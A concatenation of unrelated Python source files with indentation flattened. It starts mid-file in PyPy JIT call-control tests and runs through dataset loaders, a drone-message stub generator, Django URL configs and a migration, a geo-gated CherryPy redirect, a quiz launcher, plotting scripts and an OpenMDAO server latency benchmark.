assert call_descr.extrainfo.call_release_gil_target == (
call_target, rffi.RFFI_SAVE_ERRNO)
def test_random_effects_on_stacklet_switch():
from rpython.jit.backend.llgraph.runner import LLGraphCPU
from rpython.translator.platform import CompilationError
try:
from rpython.rlib._rffi_stacklet import switch, handle
except CompilationError as e:
if "Unsupported platform!" in e.out:
py.test.skip("Unsupported platform!")
else:
raise e
@jit.dont_look_inside
def f():
switch(rffi.cast(handle, 0))
rtyper = support.annotate(f, [])
jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
res = cc.find_all_graphs(FakePolicy())
[f_graph] = [x for x in res if x.func is f]
[block, _] = list(f_graph.iterblocks())
op = block.operations[-1]
call_descr = cc.getcalldescr(op)
assert call_descr.extrainfo.has_random_effects()
def test_no_random_effects_for_rotateLeft():
from rpython.jit.backend.llgraph.runner import LLGraphCPU
from rpython.rlib.rarithmetic import r_uint
if r_uint.BITS == 32:
py.test.skip("64-bit only")
from rpython.rlib.rmd5 import _rotateLeft
def f(n, m):
return _rotateLeft(r_uint(n), m)
rtyper = support.annotate(f, [7, 9])
jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
res = cc.find_all_graphs(FakePolicy())
[f_graph] = [x for x in res if x.func is f]
[block, _] = list(f_graph.iterblocks())
op = block.operations[-1]
call_descr = cc.getcalldescr(op)
assert not call_descr.extrainfo.has_random_effects()
assert call_descr.extrainfo.check_is_elidable()
def test_elidable_kinds():
from rpython.jit.backend.llgraph.runner import LLGraphCPU
@jit.elidable
def f1(n, m):
return n + m
@jit.elidable
def f2(n, m):
return [n, m] # may raise MemoryError
@jit.elidable
def f3(n, m):
if n > m:
raise ValueError
return n + m
def f(n, m):
a = f1(n, m)
b = f2(n, m)
c = f3(n, m)
return a + len(b) + c
rtyper = support.annotate(f, [7, 9])
jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
res = cc.find_all_graphs(FakePolicy())
[f_graph] = [x for x in res if x.func is f]
for index, expected in [
(0, EffectInfo.EF_ELIDABLE_CANNOT_RAISE),
(1, EffectInfo.EF_ELIDABLE_OR_MEMORYERROR),
(2, EffectInfo.EF_ELIDABLE_CAN_RAISE)]:
call_op = f_graph.startblock.operations[index]
assert call_op.opname == 'direct_call'
call_descr = cc.getcalldescr(call_op)
assert call_descr.extrainfo.extraeffect == expected
def test_raise_elidable_no_result():
from rpython.jit.backend.llgraph.runner import LLGraphCPU
l = []
@jit.elidable
def f1(n, m):
l.append(n)
def f(n, m):
f1(n, m)
return n + m
rtyper = support.annotate(f, [7, 9])
jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
res = cc.find_all_graphs(FakePolicy())
[f_graph] = [x for x in res if x.func is f]
call_op = f_graph.startblock.operations[0]
assert call_op.opname == 'direct_call'
with py.test.raises(Exception):
call_descr = cc.getcalldescr(call_op)
|
import importlib
import logging
import os
import pprint
import sys
import StringIO
import cherrypy
import requests
def full_path(*extra):
return os.path.join(os.path.dirname(__file__), *extra)
sys.path.insert(0, full_path())
import db
logging.basicConfig()
sorry = 'This is only for US Citizens. Sorry and thank you for your time.'
class Root(object):
@cherrypy.expose
def index(self, tag):
redirect_url = db.urls[tag]
ip = cherrypy.request.headers['Remote-Addr']
request_url = 'http://ipinfo.io/{0}/country'.format(ip)
r = requests.get(request_url)
country = r.text.strip()
if country == 'US':
raise cherrypy.HTTPRedirect(redirect_url)
else:
return sorry
|
from battle_tested.beta.input_type_combos import input_type_combos
|
import os
import sys
import numpy as np
import matplotlib.image as mpimg
from ..core.data import Data
from ..util import tryremove
URL = 'http://synthia-dataset.cvc.uab.cat/SYNTHIA_SEQS/'
SEQS = [ # SUMMER and WINTER from sequences `1 - 6`
'SYNTHIA-SEQS-01-SUMMER',
'SYNTHIA-SEQS-01-WINTER',
'SYNTHIA-SEQS-02-SUMMER',
'SYNTHIA-SEQS-02-WINTER',
'SYNTHIA-SEQS-04-SUMMER',
'SYNTHIA-SEQS-04-WINTER',
'SYNTHIA-SEQS-05-SUMMER',
'SYNTHIA-SEQS-05-WINTER',
'SYNTHIA-SEQS-06-SUMMER',
'SYNTHIA-SEQS-06-WINTER'
]
DEV_SEQS = ['SYNTHIA-SEQS-01-SUMMER']
class SynthiaData(Data):
dirs = ['synthia']
def __init__(self, data_dir, stat_log_dir=None,
development=True, fast_dir=None):
super().__init__(data_dir, stat_log_dir,
development=development,
fast_dir=fast_dir)
def _fetch_if_missing(self):
self._maybe_get_synthia()
def get_raw_dirs(self):
root_dir = os.path.join(self.current_dir, 'synthia')
dirs = []
seqs = os.listdir(root_dir)
for seq in seqs:
seq_dir = os.path.join(root_dir, seq, seq, 'RGB', 'Stereo_Left')
views = os.listdir(seq_dir)
for view in views:
view_dir = os.path.join(seq_dir, view)
dirs.extend([view_dir])
return dirs
def _maybe_get_synthia(self):
seqs = DEV_SEQS if self.development else SEQS
for seq in seqs:
root_dir = os.path.join(self.data_dir, 'synthia')
url = URL + seq + '.rar'
url_dir = os.path.join(root_dir, seq)
if not os.path.isdir(url_dir):
self._download_and_extract(url, url_dir, 'rar')
# Remove unused directories
tryremove(os.path.join(url_dir, seq, 'GT'))
tryremove(os.path.join(url_dir, seq, 'Depth'))
tryremove(os.path.join(url_dir, seq, 'CameraParams'))
tryremove(os.path.join(url_dir, 'RGB', 'Stereo_Right'))
|
import sys
from genStubs import *
stub = Stubs( "systemMessages", sys.argv[1], sys.argv[2] )
stub.include( "nanopb/IMessage.h" )
stub.include( "systemMessages/AGLMsg.pb.h" )
stub.include( "systemMessages/AGLOffsetMsg.pb.h" )
stub.include( "systemMessages/AGLRawMsg.pb.h" )
stub.include( "systemMessages/AbortLaunchMsg.pb.h" )
stub.include( "systemMessages/AccelGyroDataMsg.pb.h" )
stub.include( "systemMessages/AccelGyroDataRaw.pb.h" )
stub.include( "systemMessages/ActiveControlSourceNotification.pb.h" )
stub.include( "systemMessages/ActiveManeuverSourceNotification.pb.h" )
stub.include( "systemMessages/ActuatorConstants.pb.h" )
stub.include( "systemMessages/ActuatorPictureMsg.pb.h" )
stub.include( "systemMessages/ActuatorPortCalibration.pb.h" )
stub.include( "systemMessages/ActuatorPortConfigMsg.pb.h" )
stub.include( "systemMessages/ActuatorPowerBusMsg.pb.h" )
stub.include( "systemMessages/ActuatorTakePicture.pb.h" )
stub.include( "systemMessages/AeroTerminateMsg.pb.h" )
stub.include( "systemMessages/AirmailDebugLogSettingsMsg.pb.h" )
stub.include( "systemMessages/AirmailPoolStatsMsg.pb.h" )
stub.include( "systemMessages/AirspeedCalibrationDataMsg.pb.h" )
stub.include( "systemMessages/AltMSLCorrection.pb.h" )
stub.include( "systemMessages/AnnounceMsg.pb.h" )
stub.include( "systemMessages/AttCtrlConfig.pb.h" )
stub.include( "systemMessages/AuxControlMix.pb.h" )
stub.include( "systemMessages/AwxHeaderMsg.pb.h" )
stub.include( "systemMessages/BoardStatus.pb.h" )
stub.include( "systemMessages/ClientRequest.pb.h" )
stub.include( "systemMessages/ConnectionStatus.pb.h" )
stub.include( "systemMessages/ContingencyEventMap.pb.h" )
stub.include( "systemMessages/ContingencyEventStatus.pb.h" )
stub.include( "systemMessages/ControlLog.pb.h" )
stub.include( "systemMessages/ControlLogRateConfig.pb.h" )
stub.include( "systemMessages/ControlRequest.pb.h" )
stub.include( "systemMessages/DateOfLastConfigurationMsg.pb.h" )
stub.include( "systemMessages/DeviceManagerMsgs.pb.h" )
stub.include( "systemMessages/EffectorCmdsMsg.pb.h" )
stub.include( "systemMessages/EffectorStatusMsg.pb.h" )
stub.include( "systemMessages/EffectorSurfaceMap.pb.h" )
stub.include( "systemMessages/EthernetStatusMsg.pb.h" )
stub.include( "systemMessages/Example.pb.h" )
stub.include( "systemMessages/FileTransferMsg.pb.h" )
stub.include( "systemMessages/FlightStatus.pb.h" )
stub.include( "systemMessages/GCSConnectivityStatus.pb.h" )
stub.include( "systemMessages/GCSJobInfoMsg.pb.h" )
stub.include( "systemMessages/GPSData.pb.h" )
stub.include( "systemMessages/GPSRestartMsg.pb.h" )
stub.include( "systemMessages/GPSStatus.pb.h" )
stub.include( "systemMessages/Geofence.pb.h" )
stub.include( "systemMessages/GuidanceConfig.pb.h" )
stub.include( "systemMessages/HealthEventMsg.pb.h" )
stub.include( "systemMessages/HobbsMeter.pb.h" )
stub.include( "systemMessages/IMUOrientationConfig.pb.h" )
stub.include( "systemMessages/INSAccelData.pb.h" )
stub.include( "systemMessages/INSAncillaryData.pb.h" )
stub.include( "systemMessages/INSAttitudeData.pb.h" )
stub.include( "systemMessages/INSConfigMsg.pb.h" )
stub.include( "systemMessages/INSCorrectionData.pb.h" )
stub.include( "systemMessages/INSCorrectionRequest.pb.h" )
stub.include( "systemMessages/INSEnums.pb.h" )
stub.include( "systemMessages/INSErrorData.pb.h" )
stub.include( "systemMessages/INSLog.pb.h" )
stub.include( "systemMessages/INSMessageComponents.pb.h" )
stub.include( "systemMessages/INSPosVelData.pb.h" )
stub.include( "systemMessages/INSStatusData.pb.h" )
stub.include( "systemMessages/KillMode.pb.h" )
stub.include( "systemMessages/LaneSplitter.pb.h" )
stub.include( "systemMessages/LaneSplitterStatsMsg.pb.h" )
stub.include( "systemMessages/LogInformationEntry.pb.h" )
stub.include( "systemMessages/LogManagement.pb.h" )
stub.include( "systemMessages/LogRequestMsg.pb.h" )
stub.include( "systemMessages/MPUCalConfig.pb.h" )
stub.include( "systemMessages/MRAirframeConfig.pb.h" )
stub.include( "systemMessages/MagCalibrationParameters.pb.h" )
stub.include( "systemMessages/MagData.pb.h" )
stub.include( "systemMessages/MagDataRaw.pb.h" )
stub.include( "systemMessages/MagOrientationConfigMsg.pb.h" )
stub.include( "systemMessages/Maneuver.pb.h" )
stub.include( "systemMessages/ManeuverExecutionStatus.pb.h" )
stub.include( "systemMessages/ManeuverPauseResumeMsg.pb.h" )
stub.include( "systemMessages/MapRcInputToFlightChannelMsg.pb.h" )
stub.include( "systemMessages/Menagerie.pb.h" )
stub.include( "systemMessages/MfgParamsMsg.pb.h" )
stub.include( "systemMessages/Mission.pb.h" )
stub.include( "systemMessages/MissionExec.pb.h" )
stub.include( "systemMessages/MissionList.pb.h" )
stub.include( "systemMessages/MissionStatus.pb.h" )
stub.include( "systemMessages/ModemConfig.pb.h" )
stub.include( "systemMessages/ModemGetRadioType.pb.h" )
stub.include( "systemMessages/ModemLinkStatus.pb.h" )
stub.include( "systemMessages/ModemPower.pb.h" )
stub.include( "systemMessages/NakMsg.pb.h" )
stub.include( "systemMessages/OperatorModuleConfig.pb.h" )
stub.include( "systemMessages/PWMRateMsg.pb.h" )
stub.include( "systemMessages/PayloadPower.pb.h" )
stub.include( "systemMessages/PosVelCtrlConfig.pb.h" )
stub.include( "systemMessages/PowerManagerConfig.pb.h" )
stub.include( "systemMessages/PowerStatus.pb.h" )
stub.include( "systemMessages/PressureData.pb.h" )
stub.include( "systemMessages/PrimaryControlMix.pb.h" )
stub.include( "systemMessages/PrimitiveDataTypes.pb.h" )
stub.include( "systemMessages/RcChannels.pb.h" )
stub.include( "systemMessages/RcInputCalibrationMsg.pb.h" )
stub.include( "systemMessages/RcInputMsg.pb.h" )
stub.include( "systemMessages/RebootRequestMsg.pb.h" )
stub.include( "systemMessages/RgbLed.pb.h" )
stub.include( "systemMessages/STM32OTPParams.pb.h" )
stub.include( "systemMessages/SaveConfigConstants.pb.h" )
stub.include( "systemMessages/ServerResponse.pb.h" )
stub.include( "systemMessages/Shape2D.pb.h" )
stub.include( "systemMessages/SimConfigurationRequest.pb.h" )
stub.include( "systemMessages/SimControlRequest.pb.h" )
stub.include( "systemMessages/StateMachineEnums.pb.h" )
stub.include( "systemMessages/SystemEnums.pb.h" )
stub.include( "systemMessages/SystemMode.pb.h" )
stub.include( "systemMessages/SystemPowerStatus.pb.h" )
stub.include( "systemMessages/TelemetryWatchdogConfig.pb.h" )
stub.include( "systemMessages/TemperatureData.pb.h" )
stub.include( "systemMessages/TestMessage.pb.h" )
stub.include( "systemMessages/ThreadStatsMsg.pb.h" )
stub.include( "systemMessages/TimeStamp.pb.h" )
stub.include( "systemMessages/VehicleDescriptionMessage.pb.h" )
stub.include( "systemMessages/VersionInfoEntry.pb.h" )
stub.newline()
stub.addLine( "typedef int16_t msgSize_t;" )
stub.newline()
stub.stubSysMsg( "CAGLMsg" )
stub.stubSysMsg( "CAGLOffsetMsg" )
stub.stubSysMsg( "CAGLRawMsg" )
stub.stubSysMsg( "CAccelGyroDataMsg" )
stub.stubSysMsg( "CAccelGyroDataRaw" )
stub.stubSysMsg( "CActiveControlSourceNotification" )
stub.stubSysMsg( "CActiveManeuverSourceNotification" )
stub.stubSysMsg( "CActuatorPictureMsg" )
stub.stubSysMsg( "CActuatorPortCalibration" )
stub.stubSysMsg( "CActuatorPortConfigMsg" )
stub.stubSysMsg( "CActuatorPowerBusMsg" )
stub.stubSysMsg( "CActuatorTakePictureMsg" )
stub.stubSysMsg( "CAirmailDebugLogSettingsMsg" )
stub.stubSysMsg( "CAirmailPoolStatsMsg" )
stub.stubSysMsg( "CAirspeedCalibrationDataMsg" )
stub.stubSysMsg( "CAltMSLCorrection" )
stub.stubSysMsg( "CAnnounceMsg" )
stub.stubSysMsg( "CAttCtrlConfig" )
stub.stubSysMsg( "CAuxControlMix" )
stub.stubSysMsg( "CAwxHeaderMsg" )
stub.stubSysMsg( "CBoardStatus" )
stub.stubSysMsg( "CClientRequest" )
stub.stubSysMsg( "CRegisterAsPeriodicPublisherMsg" )
stub.stubSysMsg( "CUnregisterAsPublisherMsg" )
stub.stubSysMsg( "CSubscribePeriodicMsg" )
stub.stubSysMsg( "CUnsubscribeTopicMsg" )
stub.stubSysMsg( "CRegisterAsCallerMsg" )
stub.stubSysMsg( "CUnregisterAsCallerMsg" )
stub.stubSysMsg( "CRegisterAsProviderMsg" )
stub.stubSysMsg( "CUnregisterAsProviderMsg" )
stub.stubSysMsg( "CCallServiceMsg" )
stub.stubSysMsg( "CPublishTopicMsg" )
stub.stubSysMsg( "CClientServiceResponseMsg" )
stub.stubSysMsg( "CConnectionStatus" )
stub.stubSysMsg( "CContingencyEventMap" )
stub.stubSysMsg( "CContingencyEventStatus" )
stub.stubSysMsg( "CControlLog" )
stub.stubSysMsg( "CControlLogRateConfig" )
stub.stubSysMsg( "CControlRequest" )
stub.stubSysMsg( "CDateOfLastConfigurationMsg" )
stub.stubSysMsg( "CSignatureIdMsg" )
stub.stubSysMsg( "CServiceInfoMsg" )
stub.stubSysMsg( "CProviderIdMsg" )
stub.stubSysMsg( "CSignatureHashMsg" )
stub.stubSysMsg( "CSignatureHashAndProviderMsg" )
stub.stubSysMsg( "CQueryResultMsg" )
stub.stubSysMsg( "CUniqueIdMsg" )
stub.stubSysMsg( "CNodeInfoMsg" )
stub.stubSysMsg( "CNodeIdAckMsg" )
stub.stubSysMsg( "CNodeIdMsg" )
stub.stubSysMsg( "CNodeIdListMsg" )
stub.stubSysMsg( "CNodeInfoFilterMsg" )
stub.stubSysMsg( "CEffectorCmdsMsg" )
stub.stubSysMsg( "CEffectorStatusMsg" )
stub.stubSysMsg( "CEffectorSurfaceMap" )
stub.stubSysMsg( "CEthernetPortStatusMsg" )
stub.stubSysMsg( "CEthernetStatusMsg" )
stub.stubSysMsg( "CListFilesRequest" )
stub.stubSysMsg( "CFileInfo" )
stub.stubSysMsg( "CListFilesResponse" )
stub.stubSysMsg( "CFileTransferMsg" )
stub.stubSysMsg( "CFlightStatus" )
stub.stubSysMsg( "CGCSConnectivityStatus" )
stub.stubSysMsg( "CGCSJobInfoMsg" )
stub.stubSysMsg( "CGPSData" )
stub.stubSysMsg( "CGPSRestartMsg" )
stub.stubSysMsg( "CGPSStatus" )
stub.stubSysMsg( "CGeofence" )
stub.stubSysMsg( "CGuidanceConfig" )
stub.stubSysMsg( "CHealthEventMsg" )
stub.stubSysMsg( "CHobbsMeterMsg" )
stub.stubSysMsg( "CIMUOrientationConfig" )
stub.stubSysMsg( "CINSAncillaryData" )
stub.stubSysMsg( "CINSAttitudeData" )
stub.stubSysMsg( "CINSConfigMsg" )
stub.stubSysMsg( "CINSCorrectionData" )
stub.stubSysMsg( "CINSCorrectionRequest" )
stub.stubSysMsg( "CINSErrorData" )
stub.stubSysMsg( "CINSLog" )
stub.stubSysMsg( "CVectorXYZ" )
stub.stubSysMsg( "CVectorNED" )
stub.stubSysMsg( "CDCM" )
stub.stubSysMsg( "CINSPosVelData" )
stub.stubSysMsg( "CINSStatusData" )
stub.stubSysMsg( "CKillCh" )
stub.stubSysMsg( "CKillModeMsg" )
stub.stubSysMsg( "CLaneSplitterStatsMsg" )
stub.stubSysMsg( "CLogEntryProvider" )
stub.stubSysMsg( "CLogMgmtCmd" )
stub.stubSysMsg( "CLogMgmtResponse" )
stub.stubSysMsg( "CLogRequestMsg" )
stub.stubSysMsg( "CMPUCalConfig" )
stub.stubSysMsg( "CMRAirframeConfig" )
stub.stubSysMsg( "CMagCalibrationParameters" )
stub.stubSysMsg( "CMagData" )
stub.stubSysMsg( "CMagDataRaw" )
stub.stubSysMsg( "CMagOrientationConfigMsg" )
stub.stubSysMsg( "CManeuver" )
stub.stubSysMsg( "CManeuverExecutionStatus" )
stub.stubSysMsg( "CManeuverPauseResumeMsg" )
stub.stubSysMsg( "CMapRcInputToFlightChannelMsg" )
stub.stubSysMsg( "CpointType" )
stub.stubSysMsg( "CMR_FLT_trackToPt" )
stub.stubSysMsg( "CMR_FLT_holdAtPt" )
stub.stubSysMsg( "CMR_FLT_manAttitude" )
stub.stubSysMsg( "CMR_FLT_manVelocity" )
stub.stubSysMsg( "CMR_TKO_liftoffMSL" )
stub.stubSysMsg( "CMR_LND_descendMSL" )
stub.stubSysMsg( "CMR_FLT_stopAndHold" )
stub.stubSysMsg( "CMR_LND_stopAndDescend" )
stub.stubSysMsg( "CMR_LND_attitudeOnly" )
stub.stubSysMsg( "CMR_FLT_minAltGoto" )
stub.stubSysMsg( "CMR_FLT_photoSurvey" )
stub.stubSysMsg( "CMR_FLT_surveyPoint" )
stub.stubSysMsg( "CLND_terminate" )
stub.stubSysMsg( "CFW_FLT_manAttitude" )
stub.stubSysMsg( "CFW_FLT_manFull" )
stub.stubSysMsg( "CFW_FLT_circle" )
stub.stubSysMsg( "CFW_FLT_slantTrackTo" )
stub.stubSysMsg( "CFW_FLT_directTo" )
stub.stubSysMsg( "CFW_TKO_launch" )
stub.stubSysMsg( "CFW_LND_touchdown" )
stub.stubSysMsg( "CFW_LND_glidingCircle" )
stub.stubSysMsg( "CFW_LND_attitudeOnly" )
stub.stubSysMsg( "CFW_FLT_photoSurvey" )
stub.stubSysMsg( "CMfgParamsMsg" )
stub.stubSysMsg( "CMission" )
stub.stubSysMsg( "CMissionExec" )
stub.stubSysMsg( "CMissionList" )
stub.stubSysMsg( "CMissionStatus" )
stub.stubSysMsg( "CRadioConfigMsg" )
stub.stubSysMsg( "CRadioConfigOOBMsg" )
stub.stubSysMsg( "CRadioTypeMsg" )
stub.stubSysMsg( "CradioLinkStatusMsg" )
stub.stubSysMsg( "CradioPowerMsg" )
stub.stubSysMsg( "CNakMsg" )
stub.stubSysMsg( "COperatorModuleConfig" )
stub.stubSysMsg( "CPWMRateMsg" )
stub.stubSysMsg( "CPayloadPowerMsg" )
stub.stubSysMsg( "CPosVelCtrlConfig" )
stub.stubSysMsg( "CPowerManagerConfig" )
stub.stubSysMsg( "CCircuitState" )
stub.stubSysMsg( "CPowerStatusMsg" )
stub.stubSysMsg( "CPressureData" )
stub.stubSysMsg( "CPrimaryControlMix" )
stub.stubSysMsg( "CBoolMsg" )
stub.stubSysMsg( "CSint32Msg" )
stub.stubSysMsg( "CUint32Msg" )
stub.stubSysMsg( "CFloatMsg" )
stub.stubSysMsg( "CRcInputCalibrationMsg" )
stub.stubSysMsg( "CRcInputMsg" )
stub.stubSysMsg( "CRebootRequestMsg" )
stub.stubSysMsg( "CRgbLedMsg" )
stub.stubSysMsg( "CSaveConfigMsg" )
stub.stubSysMsg( "CServerResponse" )
stub.stubSysMsg( "CTopicDataMsg" )
stub.stubSysMsg( "CServiceCallResultMsg" )
stub.stubSysMsg( "CServiceCallRequestMsg" )
stub.stubSysMsg( "CServiceCallRegistrationAck" )
stub.stubSysMsg( "CAcknowledgementMsg" )
stub.stubSysMsg( "CintPointType" )
stub.stubSysMsg( "CCircleType" )
stub.stubSysMsg( "CPolygonType" )
stub.stubSysMsg( "CShape2D" )
stub.stubSysMsg( "CSimConfigurationRequest" )
stub.stubSysMsg( "CSimControlRequestMsg" )
stub.stubSysMsg( "CSystemMode" )
stub.stubSysMsg( "CSystemPowerStatusMsg" )
stub.stubSysMsg( "CTelemetryWatchdogConfig" )
stub.stubSysMsg( "CTemperatureData" )
stub.stubSysMsg( "CTestMessage" )
stub.stubSysMsg( "CThreadStatsMsg" )
stub.stubSysMsg( "CTimeStamp" )
stub.stubSysMsg( "CVehicleDescriptionMessage" )
stub.stubSysMsg( "CVersionEntry" )
stub.stubSysMsg( "CVersionMsg" )
|
import scipy.misc, numpy as np, os, sys
def save_img(out_path, img):
img = np.clip(img, 0, 255).astype(np.uint8)
scipy.misc.imsave(out_path, img)
def scale_img(style_path, style_scale):
scale = float(style_scale)
o0, o1, o2 = scipy.misc.imread(style_path, mode='RGB').shape
scale = float(style_scale)
new_shape = (int(o0 * scale), int(o1 * scale), o2)
style_target = _get_img(style_path, img_size=new_shape)
return style_target
def get_img(src, img_size=False):
img = scipy.misc.imread(src, mode='RGB') # misc.imresize(, (256, 256, 3))
if not (len(img.shape) == 3 and img.shape[2] == 3):
img = np.dstack((img,img,img))
if img_size != False:
img = scipy.misc.imresize(img, img_size)
return img
def exists(p, msg):
assert os.path.exists(p), msg
def list_files(in_path):
files = []
for (dirpath, dirnames, filenames) in os.walk(in_path):
files.extend(filenames)
break
return files
|
from datetime import datetime
import hashlib
from extractor import Ways
from date import way_date
class Helpers:
'''
'''
@staticmethod
def make_id(website, timestamp):
'''
'''
m=hashlib.md5()
m.update(''.join([website, timestamp]).encode())
return m.hexdigest()
class WayDefault:
'''
'''
@classmethod
def set_parser(cls, ParserObj):
'''
'''
cls.parser=ParserObj
def __init__(self, snap_dict):
'''
'''
self._raw=snap_dict
self.timestamp=snap_dict['timestamp']
self._data=self.parser.parse(self._raw['page'])
self._data.update({
'website':snap_dict['website'],
'timestamp':way_date(self.timestamp),
})
self.id=Helpers.make_id(snap_dict['website'],self.timestamp)
self.report=snap_dict['report']
@property
def extracted(self):
'''
'''
return {k:v for k,v in self._data.items() if k != 'page'}
@property
def snapshot(self):
'''
'''
return self._data['page']
@property
def data(self):
'''
'''
return self._data
WayDefault.set_parser(Ways)
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^(?P<quiz_slug>[-A-Za-z0-9_]+)/$', views.quiz, name='quiz'),
url(r'^(?P<quiz_slug>[-A-Za-z0-9_]+)/(?P<question_slug>[-A-Za-z0-9_]+)/$', views.question, name='question')
]
|
import sys # this allows you to read the user input from keyboard also called "stdin"
import classOne # This imports all the classOne functions
import classTwo # This imports all the classTwo functions
import classThree # This imports all the classThree functions
import classFour # This imports all the classFour functions
TIMEOUT=10 # this is the amount of time you will wait for an answer in Seconds. 10 means 10 seconds
MAX_CLASS=5
QUIZ_INSTRUCTIONS = """
Get ready for the quiz. You will have 10 questions out of which you
will need 8 right to win the prize. You will have """ + str(TIMEOUT) + """ seconds
to answer each question.Press Enter to start."""
def getUsersClass(): #main
''' This function will get the user's class. It will compare the class with MAX_CLASS and
will return False if it is more than the MAX_CLASS. Class also has to be a natural number '''
print("Please tell me which Class you are in? ")
try:
usersClass = int(sys.stdin.readline().strip())
if (usersClass < 1 or usersClass > MAX_CLASS) :
print("No Quiz available for Class " + str(usersClass))
return False
else :
return usersClass
except :
print("Exception")
return False
if __name__ == '__main__':
while(True) :
usersClass = getUsersClass()
if (usersClass != False) :
break
print(QUIZ_INSTRUCTIONS)
sys.stdin.readline()
if (usersClass == 1) :
classOne.classOneQuiz()
elif (usersClass == 2) :
classTwo.classTwoQuiz()
elif(usersClass == 3):
classThree.classThreeQuiz()
elif(usersClass == 4):
classFour.classFourQuiz()
|
import numpy
from srxraylib.plot.gol import plot_image, plot
import sys
from comsyl.scripts.CompactAFReader import CompactAFReader
def plot_stack(mystack,what="intensity",title0="X",title1="Y",title2="Z"):
from silx.gui.plot.StackView import StackViewMainWindow
from silx.gui import qt
app = qt.QApplication(sys.argv[1:])
sv = StackViewMainWindow()
sv.setColormap("jet", autoscale=True)
if what == "intensity":
sv.setStack(numpy.absolute(mystack))
elif what == "real":
sv.setStack(numpy.real(mystack))
elif what == "imaginary":
sv.setStack(numpy.imag(mystack))
elif what == "phase":
sv.setStack(numpy.angle(mystack))
elif what == "phase_deg":
sv.setStack(numpy.angle(mystack,deg=True))
else:
raise Exception("Undefined label "+what)
sv.setLabels([title0,title1,title2])
sv.show()
app.exec_()
def load_stack(filename):
# filename = "/users/srio/OASYS_VE/comsyl_srio/calculations/new_u18_2m_1h_s2.5"
reader = CompactAFReader(filename)
print("File %s:" % filename)
print("contains")
print("%i modes" % reader.number_modes())
print("on the grid")
print("x: from %e to %e" % (reader.x_coordinates().min(), reader.x_coordinates().max()))
print("y: from %e to %e" % (reader.y_coordinates().min(), reader.y_coordinates().max()))
print("calculated at %f eV" % reader.photon_energy())
print("with total intensity in (maybe improper) normalization: %e" % reader.total_intensity().real.sum())
print("Occupation and max abs value of the mode")
x = reader.x_coordinates()
y = reader.y_coordinates()
eigenvalues = numpy.zeros(reader.number_modes())
mystack = numpy.zeros((reader.number_modes(),y.size,x.size),dtype=complex)
for i_mode in range(reader.number_modes()):
eigenvalues[i_mode] = reader.occupation(i_mode)
mode = reader.mode(i_mode)
mystack[i_mode,:,:] = mode.T
return x,y,mystack, eigenvalues
if __name__ == "__main__":
h,v,mystack, occupation = load_stack("/users/srio/OASYS_VE/comsyl_srio/calculations/new_u18_2m_1h_s2.5")
plot_stack(mystack,what="intensity", title0="Mode index",
title1="V from %3.2f to %3.2f um"%(1e3*v.min(),1e3*v.max()),
title2="H from %3.2f to %3.2f um"%(1e3*h.min(),1e3*h.max()))
plot(numpy.arange(occupation.size),occupation)
|
from django.conf.urls import url,include
from django.contrib import admin
from cn_device import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^send/(?P<id_ras>[0-9]+)/$',views.payam,name='send condition'),
url(r'^give/(?P<id_ras>[0-9]+)/(?P<bl>[0-1])/$', views.give_req, name='give condition'),
]
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20150819_0050'),
]
operations = [
migrations.AlterUniqueTogether(
name='test',
unique_together=set([('owner', 'name')]),
),
]
|
"""
Run latency & thruput tests on various server configurations.
"""
import glob
import os.path
import shutil
import time
from openmdao.main.mp_util import read_server_config
from openmdao.main.objserverfactory import connect, start_server
from openmdao.util.fileutil import onerror
MESSAGE_DATA = []
def init_messages():
""" Initialize message data for various sizes. """
for i in range(21):
MESSAGE_DATA.append(' ' * (1 << i))
def run_test(name, server):
""" Run latency & bandwidth test on `server`. """
for i in range(10):
server.echo(MESSAGE_DATA[0]) # 'prime' the connection.
results = []
reps = 1000
for msg in MESSAGE_DATA:
start = time.time()
for i in range(reps):
server.echo(msg)
et = time.time() - start
size = len(msg)
latency = et / reps
thruput = len(msg) / (et / reps)
print '%d msgs of %d bytes, latency %g, thruput %g' \
% (reps, size, latency, thruput)
results.append((size, latency, thruput))
if et > 2 and reps >= 20:
reps /= int((et / 2) + 0.5)
return results
def main():
""" Run latency & thruput tests on various server configurations. """
init_messages()
latency_results = {}
thruput_results = {}
# For each configuration...
count = 0
for authkey in ('PublicKey', 'UnEncrypted'):
for ip_port in (-1, 0):
for hops in (1, 2):
# Start factory in unique directory.
count += 1
name = 'Echo_%d' % count
if os.path.exists(name):
shutil.rmtree(name, onerror=onerror)
os.mkdir(name)
os.chdir(name)
try:
server_proc, server_cfg = \
start_server(authkey=authkey, port=ip_port)
cfg = read_server_config(server_cfg)
finally:
os.chdir('..')
# Connect to factory.
address = cfg['address']
port = cfg['port']
key = cfg['key']
print
print '%s, %s %d, hops: %d' % (authkey, address, port, hops)
factory = connect(address, port, authkey=authkey, pubkey=key)
if hops == 1:
server = factory
else:
# Create a server.
server = factory.create('')
# Run test.
results = run_test(name, server)
# Shutdown.
if server is not factory:
factory.release(server)
factory.cleanup()
server_proc.terminate(timeout=10)
# Add results.
for size, latency, thruput in results:
if size not in latency_results:
latency_results[size] = []
latency_results[size].append(latency)
if size not in thruput_results:
thruput_results[size] = []
thruput_results[size].append(thruput)
# Write out results in X, Y1, Y2, ... format.
header = 'Bytes,En-S-1,En-S-2,En-P-1,En-P-2,Un-S-1,Un-S-2,Un-P-1,Un-P-2\n'
with open('latency.csv', 'w') as out:
out.write(header)
for size in sorted(latency_results.keys()):
out.write('%d' % size)
for value in latency_results[size]:
out.write(', %g' % value)
out.write('\n')
with open('thruput.csv', 'w') as out:
out.write(header)
for size in sorted(thruput_results.keys()):
out.write('%d' % size)
for value in thruput_results[size]:
out.write(', %g' % value)
out.write('\n')
for path in glob.glob('Echo_*'):
shutil.rmtree(path, onerror=onerror)
if __name__ == '__main__':
main()
|
import gdb
import pwndbg.abi
